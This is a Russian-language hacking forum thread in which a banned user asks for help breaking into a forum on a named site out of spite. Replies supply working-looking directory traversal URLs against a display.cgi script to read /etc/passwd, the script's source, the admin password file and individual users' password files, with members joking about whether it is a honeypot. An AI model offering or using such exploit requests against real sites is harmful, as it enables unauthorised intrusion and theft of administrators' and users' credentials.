Народ, помогите взломать форум на http://pirates.com.ru, а то и сам сайт. Просто меня там забанили не за что и я очень разозлился!!! А сам взломать его я не смогу. Мне очень интересно узнать какие там баги есть, чтобы совершить ВЗЛОМ (не хочу я сайт дефейсить). Заранее спасибо!

Копай в этом направлении:

http://pirates.com.ru/cgi-bin/display.cgi?data=../../../../etc/passwd

Большое спасибо! И как же я сам такой баг не заметил...........

ба то баг, но помоему это fake :)

2 bad_boy
fake???? АААА =)))) Фейк =)))) УУУУАХХАХАХХХАХА ХХАХАХАХАХА АХАХАХАХ... ууу... фууу... Блин. Спасибо за улыбку на моем лице =). Сорри парень, я тебя не высмеиваю ни в коем случае =) Смотри. http://pirates.com.ru/cgi-bin/display.cgi?data=gdfgdfgd что видишь? "Unable to open /home/pirates/public_html/gdfgdfgd". Ни о чем не говорит? А если http://pirates.com.ru/cgi-bin/display.cgi?data=cgi-bin/display.cgi что видим? Види сурс display.cgi. А что еще надо? Видишь сурс любых файлов на сервере, ищешь конфиги форума или еще что. Короче принцип ясен? И в следующий раз перед тем как кричать, что Че Гевара фейками раскидывается - проверь чтоль =)

2 Модеры
Сорри за оффтопик =))))

http://pirates.com.ru/cgi-bin/display.cgi?data=../black_words.lst
=)))))))))))))))))))))))))))))))))))

http://pirates.com.ru/cgi-bin/display.cgi?data=../forum/admin.pwd
Пасс админа =)

http://pirates.com.ru/cgi-bin/display.cgi?data=../forum/users/Elvis.usr
Вместо Elvis имя пользователя. Первая переменная - пасс.

http://pirates.com.ru/cgi-bin/display.cgi?data=../forum/users/Black_Death.usr
Пасс меняй везде =))))

А хотя нет, это все Фейк =))))))))))))))))))))) ой блин =))))

http://pirates.com.ru/cgi-bin/display.cgi?data=cgi-bin/forum.cgi
Вот, кому еще форум интересен. Я так и не понял, как админ авторизируется, но мне влом дальше =)

2 Trinux
:p

Аааа....ни хрена!!!! Я на этом форуме регился дааавно! Теперь у меня пасс другой!!!

ну и пасс :D

И в следующий раз перед тем как кричать, что Че Гевара фейками раскидывается - проверь чтоль =)

Что за глупость. Я не говорил что это Че Гевара, я имел ввиду то что это админы сайта пиратов его подсунули.
я хоть и новичок в этом деле, но думаю что это всёже не файл паролей

Естественно, что это и не пароли, как таковые ...
Я просто намекнул где кроется уязвимость ...

Вообще, у меня вроде не малый опыт, но я сам лично ни разу фейка не встричал. Друзья рассказывали, а я не видел ни разу...